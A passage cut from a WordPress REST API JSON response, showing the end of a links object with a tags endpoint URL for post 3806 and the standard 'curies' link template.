ero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3806"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}